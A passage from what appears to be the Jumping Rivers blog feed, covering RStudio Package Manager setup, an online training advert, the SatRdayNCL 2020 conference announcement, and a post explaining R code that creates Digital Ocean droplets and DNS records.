&lt;p&gt;There’s lots of documentation available, for example on &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/" rel="external"&gt;CRAN&lt;/a&gt; and in &lt;a href="http://dirk.eddelbuettel.com/blog/2017/12/13/" rel="external"&gt;blog posts&lt;/a&gt;, so I won’t repeat it here.&lt;/p&gt;
&lt;h2 id="using-rstudio-package-manager"&gt;Using RStudio Package Manager&lt;/h2&gt;
&lt;p&gt;The RStudio &lt;a href="https://rstudio.com/products/package-manager/" rel="external"&gt;Package Manager&lt;/a&gt; is one of RStudio’s Pro products that is used to ultimately pay for their open source work, e.g. the RStudio desktop IDE and all of their tidyverse R packages.&lt;/p&gt;
&lt;p&gt;CRAN mirrors have for a long time distributed binary packages for Windows and Mac. The RSPM provides precompiled binaries for CRAN packages for&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ubuntu 16.04 (Xenial), Ubuntu 18.04 (Bionic)&lt;/li&gt;
&lt;li&gt;CentOS/RHEL 7, CentOS/RHEL 8&lt;/li&gt;
&lt;li&gt;openSUSE 42/SLES 12, openSUSE 15/SLES 15&lt;/li&gt;
&lt;li&gt;Windows (soon, currently in beta)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The big advantage of RSPM over the Ubuntu binaries solution above, is that root access is no longer necessary. Users can just install via the usual &lt;code&gt;install.packages()&lt;/code&gt;.&lt;/p&gt;
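&lt;p&gt;As a rough sketch, pointing R at a Package Manager repository is a matter of setting the &lt;code&gt;repos&lt;/code&gt; option. The URL below is an assumption based on the public RSPM instance and an Ubuntu 18.04 (Bionic) machine; use the repository URL shown on the setup page of your own server, which may also list further settings needed for binaries to be served:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Assumption: public RSPM URL for Ubuntu 18.04 (Bionic); replace with your own
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rspm_url = &amp;#34;https://packagemanager.rstudio.com/all/__linux__/bionic/latest&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;options(repos = c(CRAN = rspm_url))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# No root access needed: packages go into the user library as usual
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;install.packages(&amp;#34;dplyr&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Placing the &lt;code&gt;options()&lt;/code&gt; call in &lt;code&gt;.Rprofile&lt;/code&gt; makes the repository the default for every session.&lt;/p&gt;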
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Online R, Python &amp; Git Training!</title><link>https://www.jumpingrivers.com/blog/online-r-python-git-training/</link><pubDate>Mon, 16 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/online-r-python-git-training/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/online-r-python-git-training/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/online-r-python-git-training/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hey there!&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers, we have the capabilities to teach you R, Python &amp;amp; Git &lt;strong&gt;&lt;em&gt;virtually&lt;/em&gt;&lt;/strong&gt;. For the last three years we have been running online training courses for small groups (and even 1 to 1).&lt;/p&gt;
&lt;h3 id="how-is-it-different-to-an-in-person-course"&gt;How is it different to an in-person course?&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s the same, but also different! The course content is the same, but obviously the structure is adapted to online training. For example, rather than a single long session, we would break the day up over a couple of days and allow regular check-in points.&lt;/p&gt;
&lt;p&gt;For the courses, we use &lt;a href="https://whereby.com" rel="external"&gt;whereby.com&lt;/a&gt;. This provides screen-sharing for both instructor and attendees, so none of the interactivity is lost.&lt;/p&gt;
&lt;h3 id="what-about-it-restrictions"&gt;What about IT restrictions?&lt;/h3&gt;
&lt;p&gt;Don&amp;rsquo;t worry! If your current IT security/infrastructure is a problem, we have two solutions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Training can be done using cloud services. We can provide a secure RStudio server or Jupyter notebook environment just for &lt;strong&gt;your&lt;/strong&gt; team. This means attendees simply have to log on to our cloud service to be able to use the appropriate software and packages.&lt;/li&gt;
&lt;li&gt;We have a fleet of state of the art Chromebooks, available to post to attendees. Each Chromebook comes with all required software and packages pre-installed. A microphone headset can also be provided if necessary.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="what-is-the-classroom-size"&gt;What is the classroom size?&lt;/h3&gt;
&lt;p&gt;We have a maximum online classroom size of 12, including the instructor. Attendees will get the opportunity for a follow-up &amp;ldquo;virtual coding clinic&amp;rdquo;, split into smaller class sizes, in order to enquire about anything related to the course or how they can apply it to their work.&lt;/p&gt;
&lt;p&gt;If you would like to enquire about virtual training, either email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; or contact us &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;via our website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/online-r-python-git-training/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>#SatRdayNCL is back - don't miss out</title><link>https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/</link><pubDate>Wed, 04 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are very pleased to announce, as you might already be aware, that SatRday is coming back to Newcastle upon Tyne on 4th April 2020. SatRdays are one-day, non-profit, community organised R conferences held across the world.&lt;/p&gt;
&lt;h2 id="where-will-it-be-held"&gt;Where will it be held?&lt;/h2&gt;
&lt;p&gt;The event will be held at &lt;a href="https://g.page/The-Catalyst-Newcastle?share" rel="external"&gt;The Catalyst&lt;/a&gt; - right next to St James’ Park. There are plenty of transport options available to you, meaning Newcastle is very easy to get to - there are no excuses for you not to come!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Train: 90 minutes from Edinburgh or 3 hours from London. The train station is in the middle of Newcastle.&lt;/li&gt;
&lt;li&gt;Plane: Direct flights from Schiphol, Paris, Stansted, Heathrow, Dublin, Belfast. The airport is only 15 minutes from the city centre by taxi.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-satrdayncl-is-back-dont-miss-out"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="when-will-it-be-held"&gt;When will it be held?&lt;/h2&gt;
&lt;p&gt;The main conference will be held on Saturday April 4th, with a pre-conference tutorial day held in the afternoon of the 3rd. The timings are as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tutorials: Friday 3rd April 13:00 - 16:30&lt;/li&gt;
&lt;li&gt;Main conference: Saturday 4th April 9:30 - 16:30&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The full schedule can be found on the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="what-are-the-tutorials-on"&gt;What are the tutorials on?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Julia Silge will be running a tutorial on Sentiment Analysis&lt;/li&gt;
&lt;li&gt;Jumping Rivers will be running a tutorial on “How to build an R package”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tickets to the tutorials are £50 and can be &lt;a href="https://webstore.ncl.ac.uk/conferences-and-events/faculty-of-science-agriculture-engineering/mathematics-statistics-and-physics/satrdays-tutorial" rel="external"&gt;bought online&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="who-will-be-speaking"&gt;Who will be speaking?&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve got a fantastic line up of speakers for you this year. You can find out more about our speakers and their talks on the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="keynote-speakers"&gt;Keynote speakers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Mine Çetinkaya-Rundel - Senior Lecturer at University of Edinburgh / Educator at RStudio&lt;/li&gt;
&lt;li&gt;Julia Silge - Data Scientist at RStudio&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="additional-speakers"&gt;Additional speakers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Theo Roe - one of our very own Data Scientists at Jumping Rivers&lt;/li&gt;
&lt;li&gt;Stepan Sindelar - Developer at Oracle Labs&lt;/li&gt;
&lt;li&gt;Kenneth McLean - Clinical Research Fellow at University of Edinburgh&lt;/li&gt;
&lt;li&gt;Russ Hyde - Bioinformatician at University of Glasgow&lt;/li&gt;
&lt;li&gt;Emma Vestesson - Senior Data Analyst at the Health Foundation &amp;amp; PhD student at UCL Institute of Child Health&lt;/li&gt;
&lt;li&gt;Pablo De Juan Bernabeu - PhD student at Lancaster University&lt;/li&gt;
&lt;li&gt;Chris Mainey - Senior Statistical Intelligence Analyst at University Hospitals Birmingham NHS Foundation Trust&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="how-much-is-the-event"&gt;How much is the event?&lt;/h2&gt;
&lt;p&gt;Early bird tickets have unfortunately sold out; however, the next set of tickets, at £45 (25% off), is currently on sale. If you aren’t lucky enough to be one of the first 80 to get a ticket, the full price will be £60. Be quick - when they are gone, they really are gone! &lt;a href="https://webstore.ncl.ac.uk/conferences-and-events/faculty-of-science-agriculture-engineering/mathematics-statistics-and-physics/satrday-2020" rel="external"&gt;Buy tickets online&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Submissions to speak have unfortunately closed - but hey, you get to sit back and listen to some of the most talented individuals in the R community.&lt;/p&gt;
&lt;p&gt;If you want any more information, don’t hesitate to view the &lt;a href="https://newcastle2020.satrdays.org/" rel="external"&gt;#SatRdayNCL website&lt;/a&gt; or e-mail &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Cheers and I hope you can make it!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://unsplash.com/@askkell?utm_medium=referral&amp;utm_campaign=photographer-credit&amp;utm_content=creditBadge" rel="external" title="Download free do whatever you want high-resolution photos from Andy Kelly"&gt;Image by Andy Kelly&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdayncl-is-back-dont-miss-out/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R as a tool for Systems Administration</title><link>https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/</link><pubDate>Mon, 27 Jan 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When talking about languages to use in production in data science, R is usually not part of the conversation and, if it is, it&amp;rsquo;s referenced as a secondary language. One of the main reasons is that R is commonly associated with statistical analysis, while languages like Python and JavaScript are seen as more suitable for other tasks, such as creating web applications or implementing machine learning models. However, one realm where R’s capabilities haven’t been fully explored is Systems Administration.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we make use of R as our main tool for doing tasks related to Systems Administration. We implement our solutions by creating one package per service and then developing the specific functions needed to manage it. One of the packages that we have developed is named {jrDroplet}.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-as-a-tool-for-systems-administration"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="jrdroplet"&gt;{jrDroplet}&lt;/h2&gt;
&lt;p&gt;{jrDroplet} is a package designed specifically to manage Virtual Machines in Digital Ocean for our training courses. The idea is that with a single line we are able to create a Digital Ocean droplet with the packages installed for our courses, hiding all of the background complexities related to infrastructure. Below is an overview of our &lt;code&gt;create_droplet()&lt;/code&gt; function, reduced slightly for simplicity:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_droplet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(client_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image_base,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dns_root)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_latest_training_snapshot&lt;/span&gt;(region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image_base)[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Using image &amp;#34;&lt;/span&gt;, image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplet_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;id)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplets&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting for IP address to be assigned to VM&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ip_address &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplets[[droplet_name]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;networks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;v4[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;domain_record_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dns_root,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;A&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This function takes a set of arguments and carries out a number of steps that would otherwise have to be done manually in the Digital Ocean interface. Below I explain what each part of the code does and what the equivalent action in the interface would be.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_latest_training_snapshot&lt;/span&gt;(region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image_base)[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this code chunk we obtain the latest snapshot created in the Jumping Rivers Digital Ocean organization, filtered by base image, that is, either the R image or the Python image. These base images are built using a tool named Packer; the implementation details of that process will come in a future post. The equivalent in the interface would be, when creating a droplet, to select the Snapshots tab and manually pick the training snapshot.&lt;/p&gt;
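&lt;p&gt;The internals of &lt;code&gt;get_latest_training_snapshot()&lt;/code&gt; are not shown in this post, so the following is only a minimal sketch of the idea in base R. It assumes each snapshot is a list with a &lt;code&gt;name&lt;/code&gt; and an ISO 8601 &lt;code&gt;created_at&lt;/code&gt; field; the helper &lt;code&gt;pick_latest_snapshot()&lt;/code&gt; and the example records are hypothetical.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical snapshot records, for illustration only
snapshots = list(
  list(name = &amp;#34;training-r-a&amp;#34;, created_at = &amp;#34;2020-01-10T09:00:00Z&amp;#34;),
  list(name = &amp;#34;training-python-a&amp;#34;, created_at = &amp;#34;2020-02-01T09:00:00Z&amp;#34;),
  list(name = &amp;#34;training-r-b&amp;#34;, created_at = &amp;#34;2020-02-15T09:00:00Z&amp;#34;)
)

# Keep snapshots whose name contains `base`, then return the newest one
pick_latest_snapshot = function(snapshots, base) {
  matches = Filter(function(s) grepl(base, s$name, fixed = TRUE), snapshots)
  if (length(matches) == 0) {
    return(NULL)
  }
  created = vapply(matches, function(s) s$created_at, character(1))
  created = as.POSIXct(created, format = &amp;#34;%Y-%m-%dT%H:%M:%SZ&amp;#34;, tz = &amp;#34;UTC&amp;#34;)
  matches[[which.max(as.numeric(created))]]
}

image = pick_latest_snapshot(snapshots, base = &amp;#34;training-r&amp;#34;)
message(&amp;#34;Using image &amp;#34;, image$name)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;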
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplet_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplet_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; region &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; region,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ssh_keys &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ssh_keys,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vm_size,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; image &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; image&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;id)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this code chunk we use the {analogsea} package, which is the backbone of our {jrDroplet} package. {analogsea} is a package for managing Digital Ocean infrastructure through the API and, following Open Source principles, we are building on it for our specific use case. Here we use the &lt;code&gt;droplet_create()&lt;/code&gt; function to create the Droplet for our training VM with the desired parameters, based on the latest training snapshot.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; droplets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;droplets&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ip_address &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; droplets[[droplet_name]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;networks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;v4[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; analogsea&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;domain_record_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dns_root,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;A&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sub_domain,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ip_address
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is the final code chunk we are going to discuss in this post. Here we first list all of the available droplets and then look up the IP address of the droplet we just created. We need this IP address for the function &lt;code&gt;domain_record_create()&lt;/code&gt;. Very briefly, a Domain Record connects a specific name to a specific IP address, and such records are stored in the Domain Name System (DNS). So in this command, we take the IP address and use our base DNS root name to create a new subdomain specifically for this new droplet. If we were to do this through the DO interface we would need to go to the Networking tab and select options from dropdown menus.&lt;/p&gt;
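&lt;p&gt;A freshly created droplet may not have an IP address straight away, so in practice the lookup may need to be retried. The following is a minimal sketch of a polling helper in base R; &lt;code&gt;wait_for()&lt;/code&gt; and &lt;code&gt;fake_fetch()&lt;/code&gt; are hypothetical names and are not part of {analogsea} or {jrDroplet}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Call `fetch()` until it returns a non-NULL value, pausing between attempts.
# Errors raised by `fetch()` are treated as &amp;#34;not ready yet&amp;#34;.
wait_for = function(fetch, attempts = 10, delay = 1) {
  for (i in seq_len(attempts)) {
    value = tryCatch(fetch(), error = function(e) NULL)
    if (!is.null(value)) {
      return(value)
    }
    Sys.sleep(delay)
  }
  stop(&amp;#34;No value returned after &amp;#34;, attempts, &amp;#34; attempts&amp;#34;)
}

# Stand-in for the API call: only succeeds on the third attempt
counter = new.env()
counter$n = 0
fake_fetch = function() {
  counter$n = counter$n + 1
  if (counter$n == 3) &amp;#34;203.0.113.10&amp;#34; else NULL
}

ip_address = wait_for(fake_fetch, delay = 0)

# With the code from this post, the call might look like:
# ip_address = wait_for(function() {
#   analogsea::droplets()[[droplet_name]]$networks$v4[[1]]$ip_address
# })
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;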
